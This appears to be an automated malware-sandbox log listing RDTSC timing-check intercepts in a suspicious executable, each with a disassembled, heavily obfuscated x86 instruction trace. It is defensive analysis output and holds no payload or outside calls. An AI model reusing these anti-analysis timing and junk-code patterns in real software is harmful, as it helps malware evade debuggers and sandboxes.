Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30CD8B second address: 30CD95 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30CE1F second address: 30CE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9B30E293C2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30CE38 second address: 30CE57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 43D84DC3h 0x0000000e add dword ptr [ebp+122D1C6Ah], edx 0x00000014 push A6FE77E1h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30D4D7 second address: 30D4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30D4DB second address: 30D4DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30D91D second address: 30D967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c nop 0x0000000d jmp 00007F9B30E293C2h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9B30E293C5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30DB51 second address: 30DB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30FEB6 second address: 30FEBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30FEBB second address: 30FF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F9B30829928h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jmp 00007F9B3082992Eh 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D3B2Bh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F9B30829928h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D2D6Ah] 0x00000053 jnp 00007F9B3082992Bh 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jc 00007F9B3082992Ch 0x00000062 js 00007F9B30829926h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30F630 second address: 30F645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30FF40 second address: 30FF63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9B30829928h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9B30829933h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30F645 second address: 30F649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 310AE8 second address: 310B07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9B30829933h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 310B07 second address: 310BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F9B30E293B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 clc 0x00000023 jmp 00007F9B30E293C6h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F9B30E293B8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 sbb ch, FFFFFFFAh 0x00000048 mov dword ptr [ebp+122D26D4h], eax 0x0000004e popad 0x0000004f mov dword ptr [ebp+122D3AE2h], eax 0x00000055 push 00000000h 0x00000057 jnl 00007F9B30E293BCh 0x0000005d mov esi, dword ptr [ebp+122D2D4Eh] 0x00000063 xchg eax, ebx 0x00000064 jmp 00007F9B30E293C6h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 310BB1 second address: 310BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 310BB5 second address: 310BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 310BC6 second address: 310BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 312D37 second address: 312D40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 312D40 second address: 312D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D26CDh], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F9B30829928h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b sbb esi, 1AA96CC4h 0x00000031 pushad 0x00000032 sbb dx, DADCh 0x00000037 mov edi, 76322655h 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 mov dword ptr [ebp+122D26C7h], eax 0x00000046 pop edi 0x00000047 push eax 0x00000048 js 00007F9B30829930h 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 pop esi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 313813 second address: 313817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 314F5F second address: 314F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 318450 second address: 318479 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9B30E293BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F9B30E293C3h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 318479 second address: 3184AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9B30829934h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F9B30829930h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3184AC second address: 3184B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2C58E0 second address: 2C5900 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9B3082992Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F9B30829926h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F9B3082992Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2C5900 second address: 2C590B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F9B30E293B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 319BEC second address: 319BF6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 319BF6 second address: 319BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 319BFC second address: 319C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 319C00 second address: 319C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31BF6F second address: 31BF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31DE07 second address: 31DE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31EDDA second address: 31EDEB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31EDEB second address: 31EDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31EDF2 second address: 31EE61 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9B30829928h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9B30829928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+12462103h] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F9B30829928h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2E8Eh] 0x0000004f xor dword ptr [ebp+1247BB77h], ebx 0x00000055 push 00000000h 0x00000057 jng 00007F9B30829929h 0x0000005d movsx edi, cx 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31EE61 second address: 31EE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31EE66 second address: 31EE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31A2DD second address: 31A2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31E037 second address: 31E03C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31A2E1 second address: 31A307 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9B30E293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F9B30E293C6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31B228 second address: 31B22D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31D171 second address: 31D175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 320E5B second address: 320EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9B3082992Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F9B30829934h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9B30829928h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f clc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F9B30829928h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D21CAh] 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d pop ecx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31B22D second address: 31B252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9B30E293C9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31E0F3 second address: 31E0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31B252 second address: 31B25C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9B30E293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 31E0F7 second address: 31E105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F9B30829926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 322E84 second address: 322E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 322E88 second address: 322E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 322E8E second address: 322E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9B30E293B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 323F64 second address: 323F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F9B30829935h 0x00000010 jmp 00007F9B3082992Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 323F83 second address: 323F89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 323F89 second address: 323F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 323F8D second address: 323F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 32508B second address: 325104 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, 0677h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F9B30829928h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jmp 00007F9B30829933h 0x00000033 jp 00007F9B3082992Ch 0x00000039 mov dword ptr [ebp+122D38DEh], eax 0x0000003f push 00000000h 0x00000041 mov ebx, dword ptr [ebp+122D1D18h] 0x00000047 xchg eax, esi 0x00000048 jmp 00007F9B3082992Eh 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jg 00007F9B30829926h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3270CB second address: 3270D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3270D4 second address: 3270E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9B30829926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F9B3082992Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3270E9 second address: 32715E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 or dword ptr [ebp+122D1F04h], edi 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D3775h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F9B30E293B8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 jnp 00007F9B30E293BCh 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F9B30E293C6h 0x0000003f jmp 00007F9B30E293C5h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 32715E second address: 327180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jng 00007F9B30829926h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 327180 second address: 327184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 328176 second address: 32819D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F9B30829926h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F9B30829936h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 32819D second address: 328211 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9B30E293B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F9B30E293B8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub bl, FFFFFF95h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F9B30E293B8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov ebx, dword ptr [ebp+122D2BCEh] 0x0000004c mov edi, 3F5AC9F2h 0x00000051 xchg eax, esi 0x00000052 jmp 00007F9B30E293BEh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edx 0x0000005b push eax 0x0000005c pop eax 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 32AA7D second address: 32AA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33141A second address: 331425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 330D0B second address: 330D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F9B30829926h 0x0000000e jmp 00007F9B30829930h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 330E6A second address: 330E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 330FDE second address: 330FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F9B30829926h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 335022 second address: 335028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 335028 second address: 33502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33502C second address: 335030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3351B7 second address: 335251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F9B30829939h 0x0000000d pushad 0x0000000e jmp 00007F9B30829938h 0x00000013 jmp 00007F9B30829938h 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jmp 00007F9B30829939h 0x00000023 mov eax, dword ptr [eax] 0x00000025 jmp 00007F9B30829939h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 je 00007F9B30829926h 0x00000037 pop ecx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33A858 second address: 33A85C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 33A85C second address: 33A875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F9B3082992Fh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
